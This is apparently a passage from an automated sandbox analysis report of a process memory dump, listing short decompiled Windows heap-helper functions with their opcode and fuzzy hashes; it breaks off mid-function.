Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 467026a5701945237a58ac921112dea6321ee7af7e09024ebb923491c5cf51ea
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: F9C08C30280A00AAEB221F20CE11B0176A0BB91B09F4404A06301DA0F0DB78E802EA00

Uniqueness

Uniqueness Score: -1.00%

Function 04A4AD30, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04A4AD30(intOrPtr _a4) {

				return L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x04a4ad49

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: bfba7dfe5a5bcd0b5f5145275b1e90c03a144cfd288e3b0f421b09530309e0b0
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: F4C08C32090248BBC7126A45CE00F017B29E790B60F000020B6040A6618936E860D588

Uniqueness

Uniqueness Score: -1.00%

Function 04A576E2, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04A576E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x04a576e4
0x00000000
0x04a576f8
0x04a576fd

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: b8403217903b5f3d619369559ace609d85aa2dc7029ceac4bde76db3d118d424
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 05C08CB81611805AEB2A6B08CF20B203650AB08B0CF48059CAE02298B1C37CB802C208

Uniqueness

Uniqueness Score: -1.00%

Function 04A736CC, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04A736CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L04A64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x04a736d2
0x04a736e8
0x04a736d4
0x04a736e5
0x04a736e5

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: ccab2c3be19966434e891142ca97903af9f830312428f9013e250ade4fdfa787
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: C8C09B75195440FBEB255F30CE51F16B254FB45A65F6507547221495F0D569BC00E604

Uniqueness

Uniqueness Score: -1.00%

Function 04A63A1C, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04A63A1C(intOrPtr _a4) {
				void* _t5;

				return L04A64620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x04a63a35

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 167bf32bbabe1eb3a713651aa0d85a417fed480036883cf2b305bdea0fca4d21
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: F7C08C32080248BBC7126E41DD00F02BB29E794B60F000020B6040A5608532EC60D98C

Uniqueness

Uniqueness Score: -1.00%

Function 04A67D50, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04A67D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x04a67d56
0x04a67d5b
0x04a67d60
0x04a67d5d
0x04a67d5d
0x04a67d5d

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 70330e555c7d6867a54659d011bec4febbd35377350c56f0a87a5bfb5bd86e84
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 01B09238311940CFDF16DF18C080B1533E4BB44A44B8404D0E401CBA20D229E8008900

Uniqueness

Uniqueness Score: -1.00%

Function 04A72ACB, Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04A72ACB() {
				void* _t5;

				return E04A5EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x04a72adc

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 4cf15eae6f2460c63e4dbf3a09c572dcf0881b5d8e4ea2e496814f08fd6e3137
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 66B01232D10440CFCF02EF40C710B1E7331FB00750F068490940127930C238BD01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 04A895F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 980ecd97c5881d0eeb5fd24e652e773b3e8a7d766598c19d5bf5a68398e1c4fd
Instruction ID: 038f1dd5d0ca7de171a37e232c84bfeaa53f1dca54c909df0ac687b400a2b94b
Opcode Fuzzy Hash: 980ecd97c5881d0eeb5fd24e652e773b3e8a7d766598c19d5bf5a68398e1c4fd
Instruction Fuzzy Hash: 6490027120100802F50461694904686008597D0345F51C011A6015655E96A5DCD17171

Uniqueness

Uniqueness Score: -1.00%

Function 04A89520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e7f28310cb007bde60d333838ca4a2ee5161b9d00b36ce5300895d09c91a585
Instruction ID: 8453127e2338e2759bd6299b6e71e99f8d9b624a7ab9cf0843a360b1f21c5540
Opcode Fuzzy Hash: 0e7f28310cb007bde60d333838ca4a2ee5161b9d00b36ce5300895d09c91a585
Instruction Fuzzy Hash: E19002E1201140926900A2698504B0A458597E0245B51C016E1045560CC565DC91A175

Uniqueness

Uniqueness Score: -1.00%

Function 04A8AD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cdfc74b03a6aab1046ca70b66d60d4f25124ff84f6f0656824f2eecc89aec56
Instruction ID: dba17b54acf9adfcf79aae1f9d10b8665a645bdb738d8e65f62aa4c338855c80
Opcode Fuzzy Hash: 2cdfc74b03a6aab1046ca70b66d60d4f25124ff84f6f0656824f2eecc89aec56
Instruction Fuzzy Hash: 19900271A0500012B540716949146464086A7E0785B55C011A0505554C8994DE9563F1

Uniqueness

Uniqueness Score: -1.00%

Function 04A89560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da493b725ae17b9319aeb179d0a08eea7174cdc0a8490d205be36519c5788c3b
Instruction ID: ebf32b3a655ce2d70b9b9998f963be83664103933a169a12eae4b3fd24a63a69
Opcode Fuzzy Hash: da493b725ae17b9319aeb179d0a08eea7174cdc0a8490d205be36519c5788c3b
Instruction Fuzzy Hash: F4900265221000022545A569070450B04C5A7D6395391C015F1407590CC661DCA56371

Uniqueness

Uniqueness Score: -1.00%

Function 04A896D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 957fa895b465fdb3520c7ed34509f542af28887e6bc77fab8dc3f3d24f7292a0
Instruction ID: 409325d3c1f68e2b172d5d424c36521b07e2597d303c5f91dcb44428512cea53
Opcode Fuzzy Hash: 957fa895b465fdb3520c7ed34509f542af28887e6bc77fab8dc3f3d24f7292a0
Instruction Fuzzy Hash: C990027120100842F50061694504B46008597E0345F51C016A0115654D8655DC917571

Uniqueness

Uniqueness Score: -1.00%

Function 04A89610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23c73b7b0a0698f2495fffa603031d68e591140be6289ed0cba3d76d0ca8f78b
Instruction ID: 6c6f27efd979a7e2df297c66d0f9ad3686dba279a1b0b490b4f912002529b76c
Opcode Fuzzy Hash: 23c73b7b0a0698f2495fffa603031d68e591140be6289ed0cba3d76d0ca8f78b
Instruction Fuzzy Hash: AE90027160500802F55071694514746008597D0345F51C011A0015654D8795DE9576F1

Uniqueness

Uniqueness Score: -1.00%

Function 04A89660, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c7e33f5125cd49ea34ebc95af13793ddf15d896e999256fc92ae92ee33ceef1
Instruction ID: 92fcd36962b16e25c0989cbce96d8ba3ec759994a7ae05e171a73d8f54ce972d
Opcode Fuzzy Hash: 0c7e33f5125cd49ea34ebc95af13793ddf15d896e999256fc92ae92ee33ceef1
Instruction Fuzzy Hash: B490027120100802F5807169450464A008597D1345F91C015A0016654DCA55DE9977F1

Uniqueness

Uniqueness Score: -1.00%

Function 04A89650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 325b07fc457f4e05ef244b03f99d171057d8e340ba9c877444f1ec5d610681ae
Instruction ID: 6b0df362fee8b8c366d2359d437c2f6043e5a2407179124b2848375c2cfbed6d
Opcode Fuzzy Hash: 325b07fc457f4e05ef244b03f99d171057d8e340ba9c877444f1ec5d610681ae
Instruction Fuzzy Hash: 5D90027120504842F54071694504A46009597D0349F51C011A0055694D9665DD95B6B1

Uniqueness

Uniqueness Score: -1.00%

Function 04A89730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54e9853aa9509c337e7ed33e50fdd9fdca382ab21e981f3ed48def0901010e26
Instruction ID: f00f99143a058764713bc4775c7202d60a765eec735a29d4c3aad2dbb942911b
Opcode Fuzzy Hash: 54e9853aa9509c337e7ed33e50fdd9fdca382ab21e981f3ed48def0901010e26
Instruction Fuzzy Hash: 9990026160500402F54071695518706009597D0245F51D011A0015554DC699DE9576F1

Uniqueness

Uniqueness Score: -1.00%

Function 04A8A710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b6346775ea5984ab9a1c81b10a0f89cf0821965464b722625a847cb06b2cf0d
Instruction ID: 374bbfc56aa0399f7bb71ff619ac85fef016b64cbccce2df4fd4c3990c6d7ca6
Opcode Fuzzy Hash: 1b6346775ea5984ab9a1c81b10a0f89cf0821965464b722625a847cb06b2cf0d
Instruction Fuzzy Hash: CB90027130100052B900A6A95904A4A418597F0345B51D015A4005554C8594DCA16171

Uniqueness

Uniqueness Score: -1.00%

Function 04A89760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e848d8f4ba7699fef60dfb625e9369085bf9aa321c4e264d4c84d3a59517b01
Instruction ID: 5a50de791497adb33c24b62f3e51d3d0ae19bc124812a2063d38aa4e72a604b5
Opcode Fuzzy Hash: 0e848d8f4ba7699fef60dfb625e9369085bf9aa321c4e264d4c84d3a59517b01
Instruction Fuzzy Hash: 5B90027120100403F50061695608707008597D0245F51D411A0415558DD696DC917171

Uniqueness

Uniqueness Score: -1.00%

Function 04A8A770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e2fd9cbceab1d53b1d08c7ee6921f112b78813432c8a787d10f7d1245e237aa
Instruction ID: 750f0188feb868192b283d231de74ee35721b252cce41eb5657d6c02ef5f2bfc
Opcode Fuzzy Hash: 0e2fd9cbceab1d53b1d08c7ee6921f112b78813432c8a787d10f7d1245e237aa
Instruction Fuzzy Hash: 9490027520504442F90065695904A87008597D0349F51D411A041559CD8694DCA1B171

Uniqueness

Uniqueness Score: -1.00%

Function 04A89770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fa0c61f75b556973e5453e5fb2c75d45ee563ee8889afdb6133da57f8e8ac33
Instruction ID: b6f6c4e156710745d7faf7f42bda45202f5ac98bd8e57a3b06443e5a4cac2223
Opcode Fuzzy Hash: 8fa0c61f75b556973e5453e5fb2c75d45ee563ee8889afdb6133da57f8e8ac33
Instruction Fuzzy Hash: 5790026120504442F50065695508A06008597D0249F51D011A1055595DC675DC91B171

Uniqueness

Uniqueness Score: -1.00%

Function 04A898A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 204dfd21e2005d852e32a3ef1ce17c152af9e1faad2e5b216ff846fbfcc71cb1
Instruction ID: 305ca4b1dd95d19d7b9ec7f75e01b54c8f756e72d2b372c796b3bebf64d47cd0
Opcode Fuzzy Hash: 204dfd21e2005d852e32a3ef1ce17c152af9e1faad2e5b216ff846fbfcc71cb1
Instruction Fuzzy Hash: 0D90026130100402F502616945146060089D7D1389F91C012E1415555D8665DD93B172

Uniqueness

Uniqueness Score: -1.00%

Function 04A898F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8384dd0fb3a94028f218ef97bd957c18773d9d4a621d865e5a934e96b1ed2801
Instruction ID: 56fc6ff72f04d2b6fa4d5bd70a86306e3150180bb7043cee3652d6e05432ffff
Opcode Fuzzy Hash: 8384dd0fb3a94028f218ef97bd957c18773d9d4a621d865e5a934e96b1ed2801
Instruction Fuzzy Hash: 3A90026160100502F50171694504616008A97D0285F91C022A1015555ECA65DDD2B171

Uniqueness

Uniqueness Score: -1.00%

Function 04A89820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a96471f073253bb9971a837f272b67254e8a349d6aa75ad7cb137809eae7a9ec
Instruction ID: f233441611ca45c65308e8f1a420859a64aa2ccad05adcba8b02a5dd42ff0666
Opcode Fuzzy Hash: a96471f073253bb9971a837f272b67254e8a349d6aa75ad7cb137809eae7a9ec
Instruction Fuzzy Hash: 1790027124100402F541716945046060089A7D0285F91C012A0415554E8695DE96BAB1

Uniqueness

Uniqueness Score: -1.00%

Function 04A8B040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43c685ddd449dfb6b94ad3b75f43ddac07def280d0c6c5bf87d662766df010f8
Instruction ID: 3c7117f03c8194e688b6f84076fa6331e2356c11b1828a46335f17370bc7d6ea
Opcode Fuzzy Hash: 43c685ddd449dfb6b94ad3b75f43ddac07def280d0c6c5bf87d662766df010f8
Instruction Fuzzy Hash: 179002A1601140436940B16949044065095A7E1345391C121A0445560C86A8DC95A2B5

Uniqueness

Uniqueness Score: -1.00%

Function 04A899D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3aa713fbedee0f2de702fe848f5f27e94de55443d05347791a53c1497cdc6d7b
Instruction ID: a9023ff294032d341b7e865ea535cbd12ef6af7bb22ea9cd9601ed9fcbe609c2
Opcode Fuzzy Hash: 3aa713fbedee0f2de702fe848f5f27e94de55443d05347791a53c1497cdc6d7b
Instruction Fuzzy Hash: 6E9002A121100042F5046169450470600C597E1245F51C012A2145554CC569DCA16175

Uniqueness

Uniqueness Score: -1.00%

Function 04A89950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff68ac8f9f293bae576d5ca9f03bef17efab3e4f28c84eb7b70b44b08c38eab0
Instruction ID: 72e36f09eccec254db36a7ccb14032eb0a9d6fb94eb677949a91cc29e59c920a
Opcode Fuzzy Hash: ff68ac8f9f293bae576d5ca9f03bef17efab3e4f28c84eb7b70b44b08c38eab0
Instruction Fuzzy Hash: B29002A120140403F54065694904607008597D0346F51C011A2055555E8A69DC917175

Uniqueness

Uniqueness Score: -1.00%

Function 04A89A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 548a8f5e3d0d00e2b125d65142d0b22812fe1fe895720c464dbfd7f97e806c54
Instruction ID: 70c6a4869ce289321761b328ec453092c2b7c249cdd665a4f03a2f8ae7b62d53
Opcode Fuzzy Hash: 548a8f5e3d0d00e2b125d65142d0b22812fe1fe895720c464dbfd7f97e806c54
Instruction Fuzzy Hash: 3890026120144442F54062694904B0F418597E1246F91C019A4147554CC955DC956771

Uniqueness

Uniqueness Score: -1.00%

Function 04A89A00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd3bdd16697b6f77b93551b0d4a859abd1f5634119f44daf436044ffc76ae336
Instruction ID: 017b84efb4b006f5b4bf0d2e8f708fb00f349c67d47fba80588c3219e8201ae9
Opcode Fuzzy Hash: dd3bdd16697b6f77b93551b0d4a859abd1f5634119f44daf436044ffc76ae336
Instruction Fuzzy Hash: 5E90027120140402F5006169491470B008597D0346F51C011A1155555D8665DC9175B1

Uniqueness

Uniqueness Score: -1.00%

Function 04A89A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 994223ce4098f70bdc1fa90ccf4b684077e155973c28c29bfbfb51c77e63f11b
Instruction ID: 346604c6e66930443043f74997e4ff18081b9388ed28efdf2f120f14ecd36bca
Opcode Fuzzy Hash: 994223ce4098f70bdc1fa90ccf4b684077e155973c28c29bfbfb51c77e63f11b
Instruction Fuzzy Hash: 1390027120140402F50061694908747008597D0346F51C011A5155555E86A5DCD17571

Uniqueness

Uniqueness Score: -1.00%

Function 04A8A3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5051f06d4a3446bb4a4bc2180a4b3b1efb129588c5d01f5f0e81e60a42979fd2
Instruction ID: fd853ade6c3a8e3d0cc06eba52656d82a552fbd095b3d9c1525fe355dcb80176
Opcode Fuzzy Hash: 5051f06d4a3446bb4a4bc2180a4b3b1efb129588c5d01f5f0e81e60a42979fd2
Instruction Fuzzy Hash: 0890027120144002F5407169854460B5085A7E0345F51C411E0416554C8655DC96A271

Uniqueness

Uniqueness Score: -1.00%

Function 04A89B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c334c8d4c1042b16915b79f945d39b7aa0f66b68182342e6ea8d81b05a0578e
Instruction ID: c5301da7045f3a7a32cbf184ab6afd077914f28fda042af0b8ba3ba7d8730533
Opcode Fuzzy Hash: 8c334c8d4c1042b16915b79f945d39b7aa0f66b68182342e6ea8d81b05a0578e
Instruction Fuzzy Hash: D490026124100802F540716985147070086D7D0645F51C011A0015554D8656DDA576F1

Uniqueness

Uniqueness Score: -1.00%

Function 04A89670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 58ac87bda88c0d5a00f8d907792ff907cb98e3e8cba485bbe35268ccee6c0737
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 04ADFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04ADFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04A8CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
